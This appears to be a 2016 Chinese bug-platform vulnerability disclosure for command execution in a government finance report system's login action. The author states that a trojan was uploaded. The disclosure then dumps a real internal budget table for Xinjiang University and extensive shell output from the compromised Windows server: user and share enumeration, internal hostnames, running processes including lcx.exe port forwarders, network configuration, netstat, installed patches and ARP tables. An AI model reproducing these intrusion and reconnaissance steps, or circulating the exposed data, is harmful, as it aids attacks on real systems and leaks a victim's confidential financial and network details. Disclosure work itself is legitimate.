2016-05-08: 细节已通知厂商并且等待厂商处理中 2016-05-11: 厂商已经确认,细节仅向厂商公开 2016-05-21: 细节向核心白帽子及相关领域专家公开 2016-05-31: 细节向普通白帽子公开 2016-06-10: 细节向实习白帽子公开 2016-06-25: 细节向公众公开
地址http://**.**.**.**/Report//userlogin.action存在命令执行漏洞
直接上传木马到服务器中
预算单位 项目分类 预算项目 预算数 剩余指标金额 实际剩余指标金额 剩余计划金额 申请计划 申请直接支付计划 申请授权支付计划 申请实拨计划 已批复计划 已批复直接支付计划 已批复授权支付计划 已批复实拨计划 未批复计划 未批复直接支付计划 未批复授权计划 未批复实拨计划 指标使用% 支付数 直接支付数 授权支付数 实拨数 支付%115006 新疆大学 001001001001 统发工资支出 A01000010 统发工资支出 3000700 3000700 3000700 0 0 0 0 0 0 0 0 0 0 0 0 0 0.00 0 0 0 0 0.00 001001001002 非统发工资支出 A01000013 非统发工资支出 83133400 69320060 83133400 8813340 13813340 0 13813340 0 8813340 0 13813340 0 5000000 0 0 0 16.62 0 0 0 0 0.00 001001002 社会保障缴费 A01000006 社会保障缴费 24434200 21848400 24434200 2585800 2585800 0 2585800 0 2585800 0 2585800 0 0 0 0 0 10.58 0 0 0 0 0.00 001001003 其他工资福利支出 A01000005 其他工资福利支出 9011500 6928100 9011500 2083400 2083400 500000 1583400 0 2083400 500000 1583400 0 0 0 0 0 23.12 0 0 0 0 0.00 001001004 在职人员地方津贴补贴 A01000008 在职人员地方津贴补贴 76925300 60375300 76925300 3550000 16550000 0 16550000 0 3550000 0 16550000 0 13000000 0 0 0 21.51 0 0 0 0 0.00 001002001 工会经费 A01000004 工会经费 1626300 1430700 1626300 195600 195600 0 195600 0 195600 0 195600 0 0 0 0 0 12.03 0 0 0 0 0.00 001002002 取暖费 A01000009 取暖费 21587000 20182890 21587000 1404110 1404110 100000 1304110 0 1404110 100000 1304110 0 0 0 0 0 6.50 0 0 0 0 0.00 001002003 其他商品服务支出 A01000002 其他商品服务支出 31234900 27262780 31214500 3951720 3972120 1700000 2272120 0 3972120 1700000 2272120 0 0 0 0 0 12.72 20400 0 20400 0 0.07 001003002 非统发离退休 A01000012 未统发离退休 47770900 42993810 47770900 4777090 4777090 0 4777090 0 4777090 0 4777090 0 0 0 0 0 10.00 0 0 0 0 0.00 001003003 住房公积金 A01000011 住房公积金 19657400 18028820 19657400 628580 1628580 0 1628580 0 628580 0 1628580 0 1000000 0 0 0 8.28 0 0 0 0 0.00 001003004 其他对个人和家庭补助支出 A01000007 其他对个人和家庭的补 8895400 8369530 8895400 525870 525870 0 525870 0 525870 0 525870 0 0 0 0 0 5.91 0 0 0 0 0.00 001003005 离退休人地方津贴补贴 A01000003 离退休人员地区津贴补 44986800 40448800 44986800 2038000 4538000 0 4538000 0 2038000 0 4538000 0 2500000 0 0 0 10.09 0 0 0 0 0.00合 计 ¥372,263,800.00 ¥320,189,890.00 ¥372,243,400.00 ¥30,553,510.00 ¥52,073,910.00 ¥2,300,000.00 ¥49,773,910.00 ¥0.00 ¥30,573,910.00 ¥2,300,000.00 ¥49,773,910.00 ¥0.00 ¥21,500,000.00 ¥0.00 ¥0.00 ¥0.00 ¥20,400.00 ¥0.00 ¥20,400.00 ¥0.00
[*] 磁盘列表 [ C:D:E: ]D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\webapps\Report\Report\> whoamitianshancwy-sjy\administrator系统找不到指定的路径。D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net user\\TIANSHANCWY-SJY 的用户帐户-------------------------------------------------------------------------------admin Administrator Guest 命令成功完成。D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net start已经启动以下 Windows 服务: Alipay payment client security service Alipay security business service Alipay security service Application Experience Application Management Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System COM+ System Application Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client eoffice Function Discovery Provider Host Group Policy Client IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent Microsoft Device Health Machine Service Microsoft Device Health Manager Service MySQL Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Protected Storage QPCore Service Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) Remote Registry RPC Endpoint Mapper Secondary Logon Security Accounts Manager Server Shell Hardware Detection Software Protection SPP Notification Service SQL Full-text Filter Daemon Launcher (MSSQLSERVER) SQL Server (MSSQLSERVER) SQL Server Analysis Services (MSSQLSERVER) SQL Server Integration Services 10.0 SQL Server Reporting Services (MSSQLSERVER) SQL Server VSS Writer SQL Server 代理 (MSSQLSERVER) System Event Notification Service Task Scheduler TBSecSvc TCP/IP NetBIOS Helper User Profile Service VMware Tools Service Windows Defender Windows Event Log Windows Firewall Windows Font Cache Service Windows Management Instrumentation Windows Remote Management (WS-Management) Windows Time Windows Update Workstation命令成功完成。D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\Windows 远程管理 命令成功完成。D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> net view服务器名称 注解-------------------------------------------------------------------------------\\CMS-IISFWQ2 \\CMS-SQL \\CMS-WZQYYFWQ \\DIANZISW-CMSWZQ \\EX2 \\EXCHANGE-SERVER \\GPS-FWQ \\HL-36C941B2CE5D \\HL-B175D083CF0A \\HL-CVS \\HL-MQR-SERVICE \\HL-ZIYUANZAIX \\HONGLIAN-C03544 \\HONGSEWB-FWD \\HONGSEWB-ZYDH-0 \\KOUAN-YYWFQ \\KOUAN_DB_03 \\NENGHAO-DLFWQ \\NENGHAO-TJXTYY \\NENGHAO-TJXTYY2 \\NENGHAO-TJXTYY3 \\NENGHAO-TJXTYY4 \\NENGHAO-TJXTYY5 \\SANNONG-AFTNSW \\SANNONG-SHUJUKU \\SANNONG-SSYQ \\TIANSHAN-YQWFW \\TIANSHANCWY-DB \\TIANSHANCWY-SJY \\WIN-1SCNCQABLZ1 \\WIN-2XBCFO1024K \\WIN-3OVL4YUIE9N \\WIN-87A2YMIO50I \\WIN-B94JBL25EVP \\WIN-BBP8VUL8GI1 \\WIN-BKISPR3PAFB \\WIN-C3PJPGF8MVY \\WIN-DEPQTJD4SXO \\WIN-I7V6ATCJED2 \\WIN-KCJKCIRJQAV \\WIN-T2COU7AFB27 \\WIN-VBHHOZ6HPEQ \\YONGYOU \\YUQING-HLWXXCJT \\YUQING-XXFX-TIA \\YUQING-XXZHANSH 命令成功完成。D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 232 暂缺 csrss.exe 316 暂缺 wininit.exe 372 暂缺 csrss.exe 380 暂缺 winlogon.exe 408 暂缺 services.exe 468 暂缺 lsass.exe 476 ProtectedStorage, SamSs lsm.exe 484 暂缺 svchost.exe 580 DcomLaunch, PlugPlay, Power svchost.exe 656 RpcEptMapper, RpcSs LogonUI.exe 736 暂缺 svchost.exe 744 Dhcp, eventlog, lmhosts svchost.exe 796 AeLookupSvc, AppMgmt, BITS, CertPropSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, seclogon, SENS, SessionEnv, ShellHWDetection, Winmgmt, wuauserv svchost.exe 832 EventSystem, fdPHost, netprofm, nsi, sppuinotify, W32Time svchost.exe 884 Netman, TrkWks, UmRdpService, UxSms svchost.exe 924 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 216 BFE, DPS, MpsSvc spoolsv.exe 880 Spooler AlipaySecSvc.exe 1032 AlipaySecSvc Apache.exe 1116 eoffice mysqld-nt.exe 1188 MySQL pcas.exe 1240 pcas svchost.exe 1292 RemoteRegistry secbizsrv.exe 1316 secbizsrv vmtoolsd.exe 1396 VMTools svchost.exe 2712 TermService svchost.exe 2752 PolicyAgent dllhost.exe 2884 COMSysApp msdtc.exe 3000 MSDTC svchost.exe 3792 FontCache sppsvc.exe 3836 sppsvc svchost.exe 3872 WinDefend DhMachineSvc.exe 4324 DeviceHealth DhPluginMgr.exe 2296 DeviceHealthPluginMgr WmiPrvSE.exe 5424 暂缺 unsecapp.exe 7048 暂缺 csrss.exe 6160 暂缺 winlogon.exe 2660 暂缺 taskhost.exe 6476 暂缺 rdpclip.exe 2072 暂缺 dwm.exe 2064 暂缺 explorer.exe 1736 暂缺 VMwareTray.exe 6044 暂缺 vmtoolsd.exe 428 暂缺 jusched.exe 5664 暂缺 WPService.exe 4708 暂缺 iLook.exe 2656 暂缺 iUpdated.exe 3304 暂缺 TBSecSvc.exe 3440 TBSecSvc TaobaoProtect.exe 304 暂缺 cmd.exe 4352 暂缺 conhost.exe 4972 暂缺 lcx.exe 4692 暂缺 cmd.exe 4636 暂缺 conhost.exe 2556 暂缺 lcx.exe 1388 暂缺 cmd.exe 4008 暂缺 conhost.exe 3760 暂缺 lcx.exe 6004 暂缺 cmd.exe 6444 暂缺 conhost.exe 6556 暂缺 lcx.exe 4268 暂缺 cmd.exe 4732 暂缺 conhost.exe 1924 暂缺 lcx.exe 4996 暂缺 cmd.exe 4844 暂缺 conhost.exe 3312 暂缺 lcx.exe 3728 暂缺 cmd.exe 1648 暂缺 conhost.exe 2180 暂缺 lcx.exe 5188 暂缺 cmd.exe 6616 暂缺 conhost.exe 300 暂缺 lcx.exe 4068 暂缺 java.exe 5388 暂缺 conhost.exe 4728 暂缺 Apache.exe 2524 暂缺 java.exe 592 暂缺 conhost.exe 4744 暂缺 java.exe 7700 暂缺 conhost.exe 6924 暂缺 java.exe 4144 暂缺 conhost.exe 1820 暂缺 java.exe 2760 暂缺 conhost.exe 2952 暂缺 msmdsrv.exe 5728 MSSQLServerOLAPService MsDtsSrvr.exe 7176 MsDtsServer100 sqlwriter.exe 2908 SQLWriter ReportingServicesService. 1128 ReportServer sqlservr.exe 9208 MSSQLSERVER fdlauncher.exe 1752 MSSQLFDLauncher fdhost.exe 1688 暂缺 conhost.exe 1656 暂缺 SQLAGENT.EXE 3540 SQLSERVERAGENT conhost.exe 1160 暂缺 QQProtect.exe 5036 QPCore QQ.exe 9816 暂缺 TXPlatform.exe 8428 暂缺 QQExternal.exe 10192 暂缺 QQExternal.exe 9672 暂缺 csrss.exe 3528 暂缺 winlogon.exe 7564 暂缺 taskhost.exe 1308 暂缺 rdpclip.exe 1784 暂缺 dwm.exe 3424 暂缺 explorer.exe 3852 暂缺 VMwareTray.exe 9312 暂缺 FeiQ.exe 1900 暂缺 emedtray.exe 2060 暂缺 jusched.exe 9700 暂缺 iLook.exe 4712 暂缺 iUpdated.exe 9952 暂缺 Alipaybsm.exe 7372 暂缺 java.exe 1988 暂缺 conhost.exe 9372 暂缺 cmd.exe 10232 暂缺 conhost.exe 5616 暂缺 tasklist.exe 8928 暂缺 D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : tianshancwy-sjy 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection 物理地址. . . . . . . . . . . . . : 00-50-56-92-12-1D DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::1c25:defb:6e88:386f%11(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 234884137 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-17-BF-78-4F-00-50-56-92-12-1D DNS 服务器 . . . . . . . . . . . : **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{751B7224-6201-46C3-A534-75D9AE3A409F}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接*: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6abd:24e8:907:f57f:9bc3(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::24e8:907:f57f:9bc3%12(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS . . . . . . . : 已禁用D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:80 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:135 **.**.**.**:0 LISTENING 656 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1433 **.**.**.**:0 LISTENING 9208 TCP **.**.**.**:2383 **.**.**.**:0 LISTENING 5728 TCP **.**.**.**:2425 **.**.**.**:0 LISTENING 1900 TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 1188 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 2712 TCP **.**.**.**:8019 **.**.**.**:0 LISTENING 1988 TCP **.**.**.**:8021 **.**.**.**:0 LISTENING 2760 TCP **.**.**.**:8082 **.**.**.**:0 LISTENING 2760 TCP **.**.**.**:8089 **.**.**.**:0 LISTENING 1988 TCP **.**.**.**:8090 **.**.**.**:0 LISTENING 1116 TCP **.**.**.**:8099 **.**.**.**:0 LISTENING 592 TCP **.**.**.**:8100 **.**.**.**:0 LISTENING 2656 TCP **.**.**.**:8101 **.**.**.**:0 LISTENING 4712 TCP **.**.**.**:9080 **.**.**.**:0 LISTENING 592 TCP **.**.**.**:9110 **.**.**.**:0 LISTENING 7700 TCP **.**.**.**:9111 **.**.**.**:0 LISTENING 4144 TCP **.**.**.**:9117 **.**.**.**:0 LISTENING 7700 TCP **.**.**.**:9119 **.**.**.**:0 LISTENING 4144 TCP **.**.**.**:9220 **.**.**.**:0 LISTENING 5388 TCP **.**.**.**:9227 **.**.**.**:0 LISTENING 5388 TCP **.**.**.**:30985 **.**.**.**:0 LISTENING 1900 TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 372 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 744 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 796 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 476 TCP **.**.**.**:49157 **.**.**.**:0 LISTENING 468 TCP **.**.**.**:49158 **.**.**.**:0 LISTENING 2752 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:3389 **.**.**.**:2320 ESTABLISHED 2712 TCP **.**.**.**:8089 **.**.**.**:55324 ESTABLISHED 1988 TCP **.**.**.**:8089 **.**.**.**:55329 ESTABLISHED 1988 TCP **.**.**.**:8089 **.**.**.**:55330 ESTABLISHED 1988 TCP **.**.**.**:8100 **.**.**.**:3331 CLOSE_WAIT 2656 TCP **.**.**.**:8100 **.**.**.**:3605 CLOSE_WAIT 2656 TCP **.**.**.**:8100 **.**.**.**:4864 CLOSE_WAIT 2656 TCP **.**.**.**:9080 **.**.**.**:53690 ESTABLISHED 592 TCP **.**.**.**:9080 **.**.**.**:53693 ESTABLISHED 592 TCP **.**.**.**:9080 **.**.**.**:53695 TIME_WAIT 0 TCP **.**.**.**:9080 **.**.**.**:53703 TIME_WAIT 0 TCP **.**.**.**:9080 **.**.**.**:53705 ESTABLISHED 592 TCP **.**.**.**:9110 **.**.**.**:53696 TIME_WAIT 0 TCP **.**.**.**:9110 **.**.**.**:53697 FIN_WAIT_2 7700 TCP **.**.**.**:9110 **.**.**.**:53698 FIN_WAIT_2 7700 TCP **.**.**.**:9110 **.**.**.**:53699 FIN_WAIT_2 7700 TCP **.**.**.**:9110 **.**.**.**:53700 FIN_WAIT_2 7700 TCP **.**.**.**:9110 **.**.**.**:53701 FIN_WAIT_2 7700 TCP **.**.**.**:9110 **.**.**.**:53702 FIN_WAIT_2 7700 TCP **.**.**.**:9110 **.**.**.**:53704 FIN_WAIT_2 7700 TCP **.**.**.**:49548 **.**.**.**:80 CLOSE_WAIT 9816 TCP **.**.**.**:50072 **.**.**.**:1521 ESTABLISHED 4144 TCP **.**.**.**:50110 **.**.**.**:1521 ESTABLISHED 4144 TCP **.**.**.**:50111 **.**.**.**:1521 ESTABLISHED 4144 TCP **.**.**.**:50594 **.**.**.**:443 CLOSE_WAIT 1316 TCP **.**.**.**:50639 **.**.**.**:1521 ESTABLISHED 592 TCP **.**.**.**:50663 **.**.**.**:1521 ESTABLISHED 592 TCP **.**.**.**:50851 **.**.**.**:80 ESTABLISHED 4708 TCP **.**.**.**:51258 **.**.**.**:1521 ESTABLISHED 7700 TCP **.**.**.**:51491 **.**.**.**:1521 ESTABLISHED 7700 TCP **.**.**.**:53085 **.**.**.**:80 CLOSE_WAIT 1240 TCP **.**.**.**:53510 **.**.**.**:1521 ESTABLISHED 5388 TCP **.**.**.**:53531 **.**.**.**:1521 ESTABLISHED 2760 TCP **.**.**.**:53536 **.**.**.**:1521 ESTABLISHED 2760 TCP **.**.**.**:53560 **.**.**.**:1521 ESTABLISHED 5388 TCP **.**.**.**:53568 **.**.**.**:1521 ESTABLISHED 2760 TCP **.**.**.**:53580 **.**.**.**:1521 ESTABLISHED 2760 TCP **.**.**.**:53721 **.**.**.**:80 CLOSE_WAIT 9816 TCP **.**.**.**:54101 **.**.**.**:80 CLOSE_WAIT 304 TCP **.**.**.**:54470 **.**.**.**:139 TIME_WAIT 0 TCP **.**.**.**:54471 **.**.**.**:51 SYN_SENT 4068 TCP **.**.**.**:54472 **.**.**.**:51 SYN_SENT 4996 TCP **.**.**.**:54473 **.**.**.**:51 SYN_SENT 5188 TCP **.**.**.**:54476 **.**.**.**:51 SYN_SENT 1388 TCP **.**.**.**:54477 **.**.**.**:51 SYN_SENT 4268 TCP **.**.**.**:54478 **.**.**.**:51 SYN_SENT 3728 TCP **.**.**.**:54479 **.**.**.**:51 SYN_SENT 6004 TCP **.**.**.**:54480 **.**.**.**:51 SYN_SENT 4692 TCP **.**.**.**:57424 **.**.**.**:1521 ESTABLISHED 592 TCP **.**.**.**:60209 **.**.**.**:1521 ESTABLISHED 4144 TCP **.**.**.**:60379 **.**.**.**:80 CLOSE_WAIT 5664 TCP **.**.**.**:60998 **.**.**.**:80 CLOSE_WAIT 9700 TCP **.**.**.**:63884 **.**.**.**:80 CLOSE_WAIT 9816 TCP **.**.**.**:65170 **.**.**.**:443 CLOSE_WAIT 1316 TCP **.**.**.**:1433 **.**.**.**:52436 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:52437 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:52438 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:52609 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:52789 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:53038 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:53039 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:54226 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:54430 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:54431 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:62736 ESTABLISHED 9208 TCP **.**.**.**:1433 **.**.**.**:64363 ESTABLISHED 9208 TCP **.**.**.**:1434 **.**.**.**:0 LISTENING 9208 TCP **.**.**.**:4300 **.**.**.**:0 LISTENING 9816 TCP **.**.**.**:4301 **.**.**.**:0 LISTENING 9816 TCP **.**.**.**:5550 **.**.**.**:0 LISTENING 2656 TCP **.**.**.**:8002 **.**.**.**:0 LISTENING 2760 TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 1988 TCP **.**.**.**:8055 **.**.**.**:0 LISTENING 592 TCP **.**.**.**:9116 **.**.**.**:0 LISTENING 7700 TCP **.**.**.**:9118 **.**.**.**:0 LISTENING 4144 TCP **.**.**.**:9226 **.**.**.**:0 LISTENING 5388 TCP **.**.**.**:10101 **.**.**.**:0 LISTENING 9816 TCP **.**.**.**:25798 **.**.**.**:0 LISTENING 4712 TCP **.**.**.**:52436 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:52437 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:52438 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:52609 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:52789 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:53038 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:53039 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:54226 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:54312 **.**.**.**:1433 TIME_WAIT 0 TCP **.**.**.**:54313 **.**.**.**:1433 TIME_WAIT 0 TCP **.**.**.**:54430 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:54431 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:62736 **.**.**.**:1433 ESTABLISHED 1988 TCP **.**.**.**:64363 **.**.**.**:1433 ESTABLISHED 1988 TCP [::]:80 [::]:0 LISTENING 4 TCP [::]:135 [::]:0 LISTENING 656 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:1433 [::]:0 LISTENING 9208 TCP [::]:2383 [::]:0 LISTENING 5728 TCP [::]:3389 [::]:0 LISTENING 2712 TCP [::]:9111 [::]:0 LISTENING 4144 TCP [::]:9119 [::]:0 LISTENING 4144 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 372 TCP [::]:49153 [::]:0 LISTENING 744 TCP [::]:49154 [::]:0 LISTENING 796 TCP [::]:49155 [::]:0 LISTENING 476 TCP [::]:49157 [::]:0 LISTENING 468 TCP [::]:49158 [::]:0 LISTENING 2752 TCP [::1]:1434 [::]:0 LISTENING 9208 UDP **.**.**.**:123 *:* 832 UDP **.**.**.**:500 *:* 796 UDP **.**.**.**:2425 *:* 1900 UDP **.**.**.**:4023 *:* 9816 UDP **.**.**.**:4151 *:* 9816 UDP **.**.**.**:4500 *:* 796 UDP **.**.**.**:5355 *:* 924 UDP **.**.**.**:7100 *:* 2656 UDP **.**.**.**:17772 *:* 4712 UDP **.**.**.**:54927 *:* 9816 UDP **.**.**.**:56789 *:* 9816 UDP **.**.**.**:56790 *:* 9816 UDP **.**.**.**:57917 *:* 5036 UDP **.**.**.**:60350 *:* 5036 UDP **.**.**.**:61680 *:* 9816 UDP **.**.**.**:64074 *:* 9816 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP **.**.**.**:54061 *:* 1128 UDP **.**.**.**:62619 *:* 9952 UDP **.**.**.**:63027 *:* 3304 UDP **.**.**.**:64982 *:* 9816 UDP [::]:123 *:* 832 UDP [::]:500 *:* 796 UDP [::]:4500 *:* 796 UDP [::]:5355 *:* 924D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> systeminfo主机名: TIANSHANCWY-SJYOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: sannong-aftnsw注册的组织: HL-soft产品 ID: 55041-507-6252596-84655初始安装日期: 2012/8/17, 11:55:19系统启动时间: 2014/8/21, 20:53:35系统制造商: VMware, Inc.系统型号: VMware Virtual Platform系统类型: x64-based PC处理器: 安装了 1 个处理器。 [01]: Intel64 Family 6 Model 26 Stepping 4 GenuineIntel ~1995 MhzBIOS 版本: Phoenix Technologies LTD 6.00, 2011/9/21Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 4,096 MB可用的物理内存: 523 MB虚拟内存: 最大值: 8,189 MB虚拟内存: 可用: 3,231 MB虚拟内存: 使用中: 4,958 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\TIANSHANCWY-SJY修补程序: 安装了 75 个修补程序。 [01]: KB977238 [02]: KB982861 [03]: 982861 [04]: KB2425227 [05]: KB2479943 [06]: KB2484033 [07]: KB2488113 [08]: KB2492386 [09]: KB2506014 [10]: KB2506212 [11]: KB2506928 [12]: KB2507618 [13]: KB2509553 [14]: KB2510531 [15]: KB2511250 [16]: KB2511455 [17]: KB2515325 [18]: KB2522422 [19]: KB2533552 [20]: KB2536275 [21]: KB2536276 [22]: KB2541014 [23]: KB2544893 [24]: KB2545698 [25]: KB2547666 [26]: KB2552343 [27]: KB2560656 [28]: KB2563227 [29]: KB2564958 [30]: KB2567680 [31]: KB2570947 [32]: KB2584146 [33]: KB2585542 [34]: KB2603229 [35]: KB2604115 [36]: KB2607047 [37]: KB2608658 [38]: KB2618451 [39]: KB2620704 [40]: KB2620712 [41]: KB2621440 [42]: KB2631813 [43]: KB2633952 [44]: KB2640148 [45]: KB2643719 [46]: KB2644615 [47]: KB2645640 [48]: KB2653956 [49]: KB2654428 [50]: KB2655992 [51]: KB2656356 [52]: KB2656373 [53]: KB2658846 [54]: KB2659262 [55]: KB2660075 [56]: KB2660649 [57]: KB2667402 [58]: KB2676562 [59]: KB2677070 [60]: KB2679255 [61]: KB2685939 [62]: KB2686831 [63]: KB2688338 [64]: KB2690533 [65]: KB2691442 [66]: KB2695962 [67]: KB2698365 [68]: KB2699779 [69]: KB2699988 [70]: KB2709630 [71]: KB2709715 [72]: KB2718523 [73]: KB2718704 [74]: KB2719985 [75]: KB976902网卡: 安装了 1 个 NIC。 [01]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::1c25:defb:6e88:386fD:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\> arp -a接口: **.**.**.** --- 0xb Internet 地址 物理地址 类型 **.**.**.** 00-50-56-92-7f-32 动态 **.**.**.** 00-50-56-92-7f-35 动态 **.**.**.** 00-50-56-92-7f-37 动态 **.**.**.** 00-50-56-92-45-df 动态 **.**.**.** 00-50-56-92-51-fb 动态 **.**.**.** 00-50-56-92-51-fc 动态 **.**.**.** 00-50-56-92-7f-3e 动态 **.**.**.** 00-50-56-92-12-35 动态 **.**.**.** 00-50-56-92-12-29 动态 **.**.**.** 00-50-56-92-12-2a 动态 **.**.**.** 00-50-56-92-12-24 动态 **.**.**.** 00-50-56-92-12-19 动态 **.**.**.** 00-50-56-92-12-1b 动态 **.**.**.** 00-50-56-92-12-1c 动态 **.**.**.** 00-50-56-92-12-2d 动态 **.**.**.** 00-50-56-92-12-30 动态 **.**.**.** 00-50-56-92-12-1e 动态 **.**.**.**2 00-50-56-92-51-fa 动态 **.**.**.**3 00-50-56-92-7e-de 动态 **.**.**.**7 00-50-56-92-52-3b 动态 **.**.**.** 00-50-56-92-10-06 动态 **.**.**.** 00-50-56-92-7f-40 动态 **.**.**.** 00-15-17-b5-51-e1 动态 **.**.**.** 00-50-56-92-0b-58 动态 **.**.**.** 00-50-56-92-12-3c 动态 **.**.**.** 00-50-56-88-06-eb 动态 **.**.**.** 00-0c-29-97-9b-0b 动态 **.**.**.** 00-0c-29-10-0b-e8 动态 **.**.**.** 00-0c-29-40-b0-db 动态 **.**.**.** 00-0c-29-c3-15-e6 动态 **.**.**.** 00-50-56-92-0b-5c 动态 **.**.**.** 00-50-56-88-37-bb 动态 **.**.**.** 00-50-56-88-06-ee 动态 **.**.**.** 00-50-56-88-06-ea 动态 **.**.**.** 00-50-56-88-64-21 动态 **.**.**.** 00-50-56-88-37-b8 动态 **.**.**.** 00-50-56-88-06-e9 动态 **.**.**.** 00-50-56-88-37-b2 动态 **.**.**.** 00-50-56-88-37-b9 动态 **.**.**.** 00-50-56-88-37-b9 动态 **.**.**.** 00-50-56-88-16-cf 动态 **.**.**.** 00-50-56-88-37-b8 动态 **.**.**.** 00-50-56-92-7c-03 动态 **.**.**.** 00-50-56-88-37-be 动态 **.**.**.** 00-50-56-92-62-92 动态 **.**.**.** 00-0c-29-84-da-c6 动态 **.**.**.** 00-50-56-88-64-26 动态 **.**.**.** 00-50-56-88-37-b9 动态 **.**.**.** d4-3d-7e-0a-74-65 动态 **.**.**.** 00-50-56-92-61-96 动态 **.**.**.**0 00-0c-29-5f-6c-cb 动态 **.**.**.**2 00-0c-29-60-62-a3 动态 **.**.**.** 00-50-56-88-64-21 动态 **.**.**.** 00-50-56-88-37-b9 动态 **.**.**.** 